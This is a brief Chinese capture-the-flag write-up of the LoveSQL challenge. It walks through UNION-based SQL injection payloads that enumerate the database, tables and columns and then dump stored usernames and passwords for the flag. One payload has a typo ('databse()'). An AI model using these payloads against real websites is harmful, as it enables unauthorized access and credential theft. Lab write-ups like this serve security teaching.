[极客大挑战 2019]LoveSQL
访问靶机,还是老样子的界面:

明确可以注入,尝试一下联合查询:' union select 1,2,3#

- 有两个回显点
查看下本机数据库名:' union select 1,2,databse()#

查表:' UNION SELECT 1,2,GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() #

查看下表l0ve1ysq1里面的列名:' UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='l0ve1ysq1'#

最后就可以查看这三个字段里面的内容了:' UNION SELECT id,GROUP_CONCAT(username),GROUP_CONCAT(password) FROM l0ve1ysq1#

- Flag就出来了
文章描述了一次针对LoveSQL靶机的数据库注入攻击过程,通过联合查询发现两个回显点,进一步获取数据库名、表名及列名,最终揭示了l0ve1ysq1表中id,username,password字段的内容,从而获得Flag。
2028

被折叠的 条评论
为什么被折叠?



